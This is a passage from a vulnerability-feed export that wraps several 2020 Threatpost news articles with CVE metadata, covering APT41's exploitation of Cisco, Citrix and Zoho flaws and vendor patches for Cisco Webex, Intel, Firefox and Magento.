uptick\u201d in exploitation on Feb. 24 \u2013 25.\n\nPost-exploit, APT41 executed a command (\u2018file /bin/pwd\u2019) on affected systems that researchers say may have achieved two objectives: \u201cFirst, it would confirm whether the system was vulnerable and the mitigation wasn\u2019t applied,\u201d researchers noted. \u201cSecond, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.\u201d\n\nOn Feb. 21, researchers next observed APT41 switching gears to exploit a Cisco RV320 router (Cisco\u2019s WAN VPN routers for small businesses) at a telecommunications organization. After exploitation, the threat actors downloaded an executable and linkable format (ELF) binary payload. Researchers aren\u2019t sure what specific exploit was used in this case, but pointed to a Metasploit module combining two CVEs ([CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) and [CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>)) to [enable remote code execution on Cisco RV320 and RV325](<https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce>) small business routers.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/25112442/APT41-timeline.png>)\n\nFinally, on March 8, the threat actor was observed [exploiting a critical vulnerability](<https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/>) in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. The flaw ([CVE-2020-10189)](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) was first disclosed on March 5 as a zero-day, and [was later patched](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) on March 7. The attackers exploited the flaw to deploy payloads (install.bat and storesyncsvc.dll) in two ways. First, after exploiting the flaw they directly uploaded a simple Java-based program (\u201clogger.zip\u201d) containing a set of commands, which then used PowerShell to download and execute the payloads. In a second attack, APT41 leveraged a legitimate Microsoft command-line tool, BITSAdmin, to download the payload.\n\nNotably, after exploitation, the attackers have been seen only leveraging publicly available malware, including Cobalt Strike (a [commercially available exploitation framework](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>)) and Meterpreter (a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code). Said researchers: \u201cWhile these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance.\u201d\n\n**APT41 Activity **\n\nInterestingly, between waves of exploitation, researchers observed a lull in APT41 activity. The first lull, between Jan. 23 and Feb. 1, was likely related to the Chinese Lunar New Year holidays (which occurred Jan. 24 \u2013 30): \u201cThis has been a common activity pattern by Chinese APT groups in past years as well,\u201d said researchers.\n\nThe second lull, occurring Feb. 2 \u2013 19, may have been related to fallout from the rapid spread of the coronavirus pandemic. Researchers noted that China had initiated [COVID-19 related quarantines](<https://threatpost.com/coronavirus-themed-cyberattacks-persists/153493/>) in cities in the Hubei province Jan. 23 \u2013 24, and rolled out quarantines to additional provinces starting between Feb. 2 and Feb. 10.\n\n\u201cWhile it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry,\u201d said researchers.\n\nThey also said that [APT41 ](<https://threatpost.com/fortnite-ransomware-masquerades-as-an-aimbot-game-hack/147549/>) has [historically](<https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html>) (since 2012) conducted dual Chinese state-sponsored espionage activity and personal, financially motivated activity. More recently, in October 2019, the [threat group was discovered](<https://threatpost.com/china-hackers-spy-texts-messagetap-malware/149761/>) using a new malware strain to intercept telecom SMS server traffic and sniff out certain phone numbers and SMS messages \u2013 particularly those with keywords relating to Chinese political dissidents.\n\n\u201cIn 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks,\u201d said researchers on Wednesday. \u201cThis new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.\u201d\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-03-25T15:57:25", "type": "threatpost", "title": "Chinese Hackers Exploit Cisco, Citrix Flaws in Massive Espionage Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-03-25T15:57:25", "id": "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "href": "https://threatpost.com/chinese-hackers-exploit-cisco-citrix-espionage/154133/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:18:04", "description": "Cisco is warning of three high-severity flaws in its popular Webex web conferencing app, including one that could allow an unauthenticated attacker to remotely execute code on impacted systems.\n\nBeyond Webex, the networking giant on Wednesday also patched a slew of bugs across several products, including its small business RV routers and TelePresence Collaboration Endpoint software. It\u2019s also investigating whether vulnerabilities affect other products.\n\nThe most severe flaw (CVE-2020-3342) exists in the Webex Meetings Desktop App for Mac and ranks 8.8 out of 10 on the CVSS scale. The flaw stems from an improper validation of cryptographic protections, on files that are downloaded by the application as part of a software update, according to Cisco.\n\n\u201cAn attacker could exploit this vulnerability by persuading a user to go to a website that returns files to the client that are similar to files that are returned from a valid Webex website,\u201d according to [Cisco\u2019s security update](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-mac-X7vp65BL>). \u201cThe client may fail to properly validate the cryptographic protections of the provided files before executing them as part of an update. A successful exploit could allow the attacker to execute arbitrary code on the affected system with the privileges of the user.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nVersions of the Webex Meetings Desktop App for Mac app earlier than Release 39.5.11 are affected; a fix is available in releases 39.5.11 and later. Windows versions of the app are not affected.\n\nA second flaw (CVE-2020-3361), which ranks 8.1 out of 10 on the CVSS scale, could allow an unauthenticated, remote attacker to gain unauthorized access to a vulnerable Webex site. The vulnerability stems from improper handling of authentication tokens by a vulnerable Webex site.\n\n\u201cAn attacker could exploit this vulnerability by sending crafted requests to a vulnerable Cisco Webex Meetings or Cisco Webex Meetings Server site,\u201d according to [Cisco\u2019s security update](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-token-zPvEjKN>). \u201cIf successful, the attacker could gain the privileges of another user within the affected Webex site.\u201d\n\nCisco Webex Meetings sites (releases WBS 39.5.25 and earlier, WBS 40.4.10 and earlier, or release WBS 40.6.0), and Cisco Webex Meetings Server (releases 4.0MR3 and earlier) are affected. The flaw has been fixed in Cisco Webex Meetings Server Release 4.0 MR3 Security Patch 1; Cisco said customers on Cisco hosted Webex Meetings sites do not need to take any actions to receive this update.\n\nThe [final Webex vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-url-fcmpdfVY>) exists in Cisco Webex Meetings Desktop App (releases earlier than Release 39.5.12), which could allow an unauthenticated, remote attacker to execute programs on an affected end-user system. This flaw (CVE-2020-3263) which ranks 7.5 out of 10 on the CVSS scale, is due to improper validation of input that is supplied to application URLs.\n\nA bad actor could exploit the glitch by persuading a user to follow a malicious URL. They could then cause an application to execute other programs that are already present on the end-user system. If malicious files are planted on the system or on an accessible network file path, the attacker could execute arbitrary code on the affected system, according to Cisco. Cisco Webex Meetings Desktop App releases earlier than Release 39.5.12; a fix is available in releases 40.1.0 and later.\n\nCisco also patched a medium-severity flaw (CVE-2020-3347) that could enable an authenticated, local attacker to gain access to sensitive information \u2013 including usernames, meeting information, or authentication tokens \u2013 on an affected system.\n\n\u201cIn an attack scenario, any malicious local user or malicious process running on a computer where WebEx Client for Windows is installed can monitor the memory mapped file for a login token,\u201d said Martin Rakhmanov with Trustwave\u2019s SpiderLabs research team, who discovered the flaw, in a [Thursday analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cisco-webex-memory-for-the-taking-cve-2020-3347/>). \u201cOnce found the token, like any leaked credentials, can be transmitted somewhere so that it can be used to login to the WebEx account in question, download Recordings, view/edit Meetings, etc.\u201d\n\n## **Remote Working Impact**\n\nThe disclosed vulnerabilities come at a time when Webex and other online conferencing apps are surging in popularity, as the coronavirus drives [more employees to work remotely](<https://threatpost.com/working-from-home-covid-19s-constellation-of-security-challenges/153720/>).\n\n\u201cDue to the global pandemic of COVID-19, there\u2019s been an explosion of video conferencing and messaging software usage to help people transition their work-life to a work from home environment,\u201d said Rakhmanov. \u201cVulnerabilities in this type of software now present an even greater risk to its users.\u201d\n\nIn addition to Webex, Cisco also patched another type of collaboration tool; its Cisco TelePresence Collaboration Endpoint Software, used for conferencing meetings. According to Cisco, a high-severity flaw (CVE-2020-3336) in the software could allow a remote attacker to modify the filesystem to cause a denial of service (DoS) or gain privileged access to the root filesystem. The bad actor would need to be authenticated, however, which is in part why the bug only ranks 7.2 out of 10 on the CVSS scale.\n\n\u201cAn attacker with administrative privileges could exploit this vulnerability by sending requests with malformed parameters to the system using the console, Secure Shell (SSH), or web API,\u201d [according to Cisco](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-tp-cmd-inj-7ZpWhvZb>). \u201cA successful exploit could allow the attacker to modify the device configuration or cause a DoS.\u201d\n\n## **Small Business Routers**\n\nCisco also patched several high-severity flaws in its [small business RV series routers](<https://www.cisco.com/c/en/us/products/routers/small-business-rv-series-routers/index.html>), which offer virtual private networking technology for remote workers at small businesses.\n\nThese fixes address vulnerabilities tied to [11 CVEs in the web-based management interface](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-routers-stack-vUxHmnNz>) of Cisco Small Business RV320, RV325, RV016, RV042, and RV082 routers, which if exploited could allow an authenticated, remote attacker with administrative privileges to execute arbitrary code on an affected device.\n\nAlso patched were [two flaws in the web-based management interface](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-routers-injection-tWC7krKQ>) of Cisco RV110W, RV130, RV130W, and RV215W Series Routers, which if exploited could enable a authenticated attacker (with administrative privileges) to execute arbitrary commands remotely.\n\nFlaws tied to six CVEs [were also patched](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-routers-Rj5JRfF8>) in the web-based management interface of Cisco Small Business RV320, RV325, RV016, RV042, and RV082 Routers. If exploited these could allow the attacker to execute arbitrary commands with root privileges on the underlying operating system.\n\nCisco\u2019s Wednesday slew of security updates also addressed the [critical \u201cRipple20\u201d flaws](<https://threatpost.com/millions-connected-devices-ripple20-bugs/156599/>) that were disclosed on Monday. The 19 different vulnerabilities, four of them critical, affect hundreds of millions of internet of things (IoT) and industrial-control devices.\n\nCisco said it is currently investigating the Cisco ASR 5000 Series Router, Cisco Home Node-B Gateway, Cisco IP Services Gateway (IPSG) and Cisco PDSN/HA Packet Data Serving Node and Home Agent to see if they are affected by the flaws.\n\n\u201cCisco is investigating its product line to determine which products may be affected by these vulnerabilities,\u201d [according to the advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-treck-ip-stack-JyBQ5GyC>). \u201cAs the investigation progresses, Cisco will update this advisory with information about affected products.\u201d\n\n**_Insider threats are different in the work-from home era. On _**[**_June 24 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>)**_, join the Threatpost edit team and our special guest, Gurucul CEO Saryu Nayyer, for a FREE webinar, \u201c_**_**The Enemy Within: How Insider Threats Are Changing.\u201d **_**_Get helpful, real-world information on how insider threats are changing with WFH, what the new attack vectors are and what companies can do about it_**_**. **_[**_Please register here_**](<https://attendee.gotowebinar.com/register/3265005683762389007?source=ART>)**_ for this Threatpost webinar._**\n\nWrite a comment\n\n**Share this article:**\n\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n", "cvss3": {}, "published": "2020-06-18T16:18:12", "type": "threatpost", "title": "Cisco Webex, Router Bugs Allow Code Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3263", "CVE-2020-3336", "CVE-2020-3342", "CVE-2020-3347", "CVE-2020-3361"], "modified": "2020-06-18T16:18:12", "id": "THREATPOST:8207D062CD4838B19CB8398D9259D2CC", "href": "https://threatpost.com/cisco-webex-router-code-execution/156706/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:15:27", "description": "Intel is warning of a rare critical-severity vulnerability affecting several of its motherboards, server systems and compute modules. The flaw could allow an unauthenticated, remote attacker to achieve escalated privileges.\n\nThe recently patched flaw ([CVE-2020-8708](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8708>)) ranks 9.6 out of 10 on the CVSS scale, making it critical. Dmytro Oleksiuk, who discovered the flaw, told Threatpost that it exists in the firmware of Emulex Pilot 3. This baseboard-management controller is a service processor that monitors the physical state of a computer, network server or other hardware devices via specialized sensors.\n\n[](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)\n\nClick to register!\n\nEmulex Pilot 3 is used by various motherboards, which aggregate all the server components into one system. Also impacted are various server operating systems, and some Intel compute modules, which are electronic circuits, packaged onto a circuit board, that provide various functions.\n\nThe critical flaw stems from improper-authentication mechanisms in these Intel products before version 1.59.\n\nIn bypassing authentication, an attacker would be able to access to the KVM console of the server. The KVM console can access the system consoles of network devices to monitor and control their functionality. The KVM console is like a remote desktop implemented in the baseboard management controller \u2013 it provides an access point to the display, keyboard and mouse of the remote server, Oleksiuk told Threatpost.\n\nThe flaw is dangerous as it\u2019s remotely exploitable, and attackers don\u2019t need to be authenticated to exploit it \u2013 though they need to be located in the same network segment as the vulnerable server, Oleksiuk told Threatpost.\n\n\u201cThe exploit is quite simple and very reliable because it\u2019s a design flaw,\u201d Oleksiuk told Threatpost.\n\nBeyond this critical flaw, Intel also fixed bugs tied to 22 critical-, high-, medium- and low-severity CVEs affecting its server board, systems and compute modules. Other high-severity flaws include a heap-based overflow ([CVE-2020-8730](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8730>)) that\u2019s exploitable as an authenticated user; incorrect execution-assigned permissions in the file system ([CVE-2020-8731](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8731>)); and a buffer overflow in daemon ([CVE-2020-8707](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8707>)) \u2014 all three of which enable escalated privileges.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/08/11153612/intel-flaw.png>)\n\nClick to enlarge.\n\nOleksiuk was credited with reporting CVE-2020-8708, as well as CVE-2020-8706, CVE-2020-8707. All other CVEs were found internally by Intel.\n\nAffected server systems include: The R1000WT and R2000WT families, R1000SP, LSVRP and LR1304SP families and R1000WF and R2000WF families.\n\nImpacted motherboards include: The S2600WT family, S2600CW family, S2600KP family, S2600TP family, S1200SP family, S2600WF family, S2600ST family and S2600BP family.\n\nFinally, impacted compute modules include: The HNS2600KP family, HNS2600TP family and HNS2600BP family. More information regarding patches is available in [Intel\u2019s security advisory](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00384.html>).\n\nIntel also issued an [array of other security advisories](<https://www.intel.com/content/www/us/en/security-center/default.html>) addressing high-severity flaws across its product lines, including ones that affect [Intel Graphics Drivers](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00369.html>), Intel\u2019s [RAID web console](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00378.html>) 3 for Windows, [Intel Server Board M10JNP2SB](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00386.html>) and [Intel NUCs](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00392.html>).\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n\nWrite a comment\n\n**Share this article:**\n\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n", "cvss3": {}, "published": "2020-08-11T20:02:22", "type": "threatpost", "title": "Critical Intel Flaw Afflicts Several Motherboards, Server Systems, Compute Modules", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135", "CVE-2020-8706", "CVE-2020-8707", "CVE-2020-8708", "CVE-2020-8730", "CVE-2020-8731"], "modified": "2020-08-11T20:02:22", "id": "THREATPOST:8A8E859062970130E3F91D160F03325C", "href": "https://threatpost.com/critical-intel-flaw-motherboards-server-compute-modules/158270/", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:26:16", "description": "Intel is warning of a high-severity vulnerability in its performance analysis tool called Intel VTune Profiler. If exploited the flaw allows an adversary to perform a privilege escalation attack, giving them elevated and unauthorized system access to a targeted system.\n\nThe VTune Profiler, formerly known as the [VTune Amplifier](<https://software.intel.com/en-us/vtune-help>), is a software performance analysis application for serial and multithreaded application developers. While the application supports Windows, Linux, and Android platforms, Intel said that versions of the Intel VTune Profiler for Windows before update 8 are affected.\n\n\u201cImproper access control in driver for Intel VTune Amplifier for Windows before update 8 may allow an authenticated user to potentially enable escalation of privilege via local access,\u201d according to an [Intel security update](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00325.html>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability ([CVE-2019-14613](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14613>)), discovered internally by Intel, has a CVSS score of 8.2 out of 10, making it high severity. Intel urged users to update to Intel VTune Profiler for Windows to update 8, [which was released Nov. 22, 2019](<https://software.intel.com/sites/default/files/managed/8d/1e/Intel_Vtune_Amplifier_2019u8_release_notes.pdf>).\n\nAs part of its regularly-scheduled updates, Intel also released patches addressing four \u201cmedium\u201d severity flaws and one \u201clow\u201d severity vulnerability.\n\n## Other Flaws\n\nOne of these is a medium-severity denial-of-service vulnerability ([CVE-2019-14615](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=%20CVE-2019-14615>)) in Intel\u2019s graphics processors \u2013 including its Core, Xeon, Pentium, Celeron and Atom brands \u2013 that could enable information disclosure (a full list of [affected chipsets are here](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00314.html>)).\n\nThe vulnerability stems from \u201cinsufficient control flow in certain data structures\u201d of some processors, and could be exploited by an unauthenticated user with local access.\n\nAnother medium-severity vulnerability ([CVE-2019-14600](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14600>)) exists in the installer of the [Intel SNMP Subagent Stand-Alone for Windows](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00300.html>), a tool that allows users to communicate using Simple Network Management Protocol (SNMP) with the Subagent on the managed server. The flaw, which stems from the uncontrolled search path element, may allow an escalation of privilege. Instead of issuing a fix, Intel said that it will discontinue the product and recommended that users \u201cuninstall it or discontinue use at their earliest convenience.\u201d\n\nIntel also patched a medium-severity flaw in the Intel [RAID Web Console](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00308.html>) (RWC) 3 for Windows, which enables users to configure the [Intel RAID Controllers](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00308.html>) (the card or chip located between the operating system and the storage drives) and disk drives installed on a system. The flaw ([CVE-2019-14601](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14601>)) stems from improper permissions in the installer of RWC and could potentially enable escalation of privilege via local access. Intel recommends updating RWC 3 for Windows to version 7.010.009.000 or later.\n\nOther flaws include an information disclosure flaw in the [Intel Chipset Device Software](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00306.html>) INF Utility ([CVE-2019-14596](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14596>)) and low-severity flaw in the [Intel Data Analytics Acceleration Library](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00332.html>) that could enable information disclosure ([CVE-2019-14629](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14629>)).\n\nThe patches come a month after Intel disclosed [a new attack](<https://threatpost.com/intel-cpus-plundervolt-attack/151006/>) in December impacting modern Intel CPUs, which could allow an attacker to extract highly-sensitive information \u2013 such as encryption keys \u2013 from affected processors by altering their voltage. The attack, dubbed \u201cPlundervolt,\u201d centers around Intel Software Guard Extensions (SGX), a set of security-related instruction codes that are built into Intel CPUs. Intel SGX shields sensitive data \u2013 such as AES encryption keys \u2013 inside \u201cenclaves,\u201d which are physically separate from other CPU memory and are protected by software encryption.\n\n_**Concerned about mobile security? **_[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) _**Top 8 Best Practices for Mobile App Security**__**, on Jan. 22 at 2 p.m. ET. **_**_Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts to discuss the secrets of building a secure mobile strategy, one app at a time._** [_**Click here to register**_](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)_**.**_\n", "cvss3": {}, "published": "2020-01-14T21:00:28", "type": "threatpost", "title": "Intel Fixes High-Severity Flaw in Performance Analysis Tool", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-14596", "CVE-2019-14600", "CVE-2019-14601", "CVE-2019-14613", "CVE-2019-14615", "CVE-2019-14629", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-01-14T21:00:28", "id": "THREATPOST:E8A45942B4C8BC03FF0C464DB57C713C", "href": "https://threatpost.com/intel-fixes-high-severity-flaw-in-performance-analysis-tool/151837/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:24:33", "description": "Mozilla has launched the latest version of its Firefox browser, which knocks out high-severity security flaws that leave systems open to attack by a remote adversary.\n\nThe patched version of Mozilla\u2019s browser, [launched on Tuesday](<https://www.mozilla.org/en-US/security/advisories/mfsa2020-05/>), is Firefox 73 and Firefox ESR 68.5. The Firefox ESR browser is its Extended Support Release version of Firefox, designed for mass deployments. Both releases tackle six vulnerabilities. Two of the high-severity bugs both allow a remote attacker to execute code on targeted devices by enticing users to visit a specially-crafted web site and exploiting browser memory corruption flaws.\n\nThe Mozilla security bulletin said both high-severity flaws are tied to \u201cmemory safety bugs within the browser engine\u201d. One of the vulnerabilities, tracked as [CVE-2020-6800,](<https://exchange.xforce.ibmcloud.com/vulnerabilities/176072>) was fixed in a previous release of Firefox 72 and the current Firefox ESR 68.5 update on Tuesday. The other vulnerability ([CVE-2020-6801](<https://exchange.xforce.ibmcloud.com/vulnerabilities/176077>)) was fixed with the release of Firefox 73, released on Tuesday.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nMemory safety mechanisms protects systems from various software bugs tied to memory access, such as buffer overflows and other issues. According to the [IBM X-Force team\u2019s analysis](<https://exchange.xforce.ibmcloud.com/vulnerabilities/176072>), a remote attacker could exploit either one of the vulnerabilities by persuading a victim to visit a specially-crafted webpage, and then use an \u201cunknown attack vectors\u201d to execute arbitrary code on the vulnerable system or cause a denial of service (DoS).\n\n\u201cSome of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code,\u201d Mozilla said.\n\nBoth memory safety bugs were reported by Mozilla developers and community members Raul Gurzau, Tyson Smith, Bob Clary, Liz Henry, and Christian Holler.\n\nAnother high-severity flaw ([CVE-2020-6796](<https://exchange.xforce.ibmcloud.com/vulnerabilities/176073>)) was fixed in Firefox 73, and also has a score of 8.8 out of 10 on the CVSS v3 scale, making it high severity. It stems from a missing bounds check (a method of detecting whether a variable is within some bounds before it is used) on the shared memory read process, within the parent process of the browser. A remote attacker could exploit this flaw by persuading a victim to visit a specially-crafted webpage, and using \u201cunknown attack vectors\u201d to then execute arbitrary code on the vulnerable system or cause a DoS.\n\n\u201cA content process could have modified shared memory relating to crash reporting information, crash itself, and cause an out-of-bound write,\u201d according to Mozilla\u2019s alert. \u201cThis could have caused memory corruption and a potentially exploitable crash.\u201d\n\nAnother flaw ([CVE-2020-6799](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6799>)) addressed by Firefox 73 stems from an error when opening PDF links from other applications (when Firefox is configured as a default PDF reader). According to Mozilla, the flaw allows a remote attacker to execute arbitrary code on the system by persuading a victim to visit a specially-crafted site and then executing arbitrary code or triggering a DoS.\n\nWhile IBM X-Force said that this flaw has a CVSS 3.0 base score of 8.8 out of 10 (which would make it high-severity), Mozilla in its alert said that the impact was \u201cmoderate.\u201d\n\n\u201cCommand line arguments could have been injected during Firefox invocation as a shell handler for certain unsupported file types,\u201d Mozilla said in its release. \u201cThis required Firefox to be configured as the default handler for a given file type and for a file downloaded to be opened in a third party application that insufficiently sanitized URL data. In that situation, clicking a link in the third party application could have been used to retrieve and execute files whose location was supplied through command line arguments.\u201d\n\nOther moderate-severity flaws include a bug stemming from incorrect parsing of the template tag that could allow JavaScript injection (CVE-2020-6798) and a glitch where extensions were granting the launch of an arbitrary app on victim\u2019s computers (CVE-2020-6797).\n\nUsers can download the [latest Firefox version here](<https://www.mozilla.org/firefox/download/thanks/>). Beyond security fixes, Mozilla also noted that users with 0patch security software may encounter crashes at startup after updating to Firefox 73. The issue will be fixed in a future Firefox release, according to Mozilla. \u201cAs a workaround, an exclusion for firefox.exe can be added within the 0patch settings,\u201d it said.\n\nThunderbird 68.5.0 has also been released, marking its first release under the ownership of [new company MZLA Technologies Corporation](<https://www.phoronix.com/scan.php?page=news_item&px=Thunderbird-MZLA-Technologies>), which is a wholly owned subsidiary of Mozilla Foundation. As part of this release, [six moderate- and low-severity flaws](<https://www.mozilla.org/en-US/security/advisories/mfsa2020-07/>) were fixed (along with CVE-2020-6800).\n\nThe February update is less severe than Mozilla\u2019s January Firefox 72 browser release, where it [patched a critical vulnerability](<https://threatpost.com/mozilla-releases-firefox-72/151636/>) actively being exploited in the wild.\n\n**_Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us _**[**_Wednesday, Feb. 19 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>)**_ when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives._**\n", "cvss3": {}, "published": "2020-02-12T19:14:59", "type": "threatpost", "title": "Mozilla Firefox 73 Browser Update Fixes High-Severity RCE Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-6796", "CVE-2020-6797", "CVE-2020-6798", "CVE-2020-6799", "CVE-2020-6800", "CVE-2020-6801"], "modified": "2020-02-12T19:14:59", "id": "THREATPOST:AF48B7955116E7E79CD8F432216C960A", "href": "https://threatpost.com/mozilla-firefox-73-browser-update-fixes-high-severity-rce-bugs/152831/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T21:03:04", "description": "Two critical flaws in Magento \u2013 Adobe\u2019s e-commerce platform that is commonly targeted by attackers like the [Magecart threat group](<https://threatpost.com/magecart-blue-bear-attack/151585/>) \u2013 could enable arbitrary code execution on affected systems.\n\nRetail is set to boom in the coming months \u2013 between [this week\u2019s Amazon Prime Day](<https://threatpost.com/amazon-prime-day-spurs-spike-in-phishing-fraud-attacks/159960/>) and [November\u2019s Black Friday](<https://threatpost.com/black-friday-shoppers-scams-fake-domains/150593/>) \u2013 which puts pressure on Adobe to rapidly patch up any holes in the popular Magento open-source platform, which powers many online shops.\n\nThe company on Thursday disclosed two critical flaws, six important-rated errors and one moderate-severity vulnerability plaguing both Magento Commerce (which is aimed at enterprises that need premium support levels, and has a license fee starting at $24,000 annually) and Magento Open Source (its free alternative).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe most severe of these include a vulnerability that allows for arbitrary code execution. The issue stems from the application not validating full filenames when using an \u201callow list\u201d method to check the file extensions. This could enable an attacker to bypass the validation and upload a malicious file. In order to exploit this flaw (CVE-2020-24407), attackers would not need pre-authentication (meaning the flaw is exploitable without credentials) \u2013 however, they would need administrative privileges.\n\nThe other critical flaw is an SQL injection vulnerability. This is a type of web security flaw that allows an attacker to interfere with the queries that an application makes to its database. An attacker without authentication \u2013 but also with administrative privileges \u2013 could exploit this bug in order to gain arbitrary read or write access to a database.\n\nAdobe also issued patches for various important improper-authorization vulnerabilities, which occur when an application does not properly check that a user is authorized to access functionality \u2014 which could ultimately expose 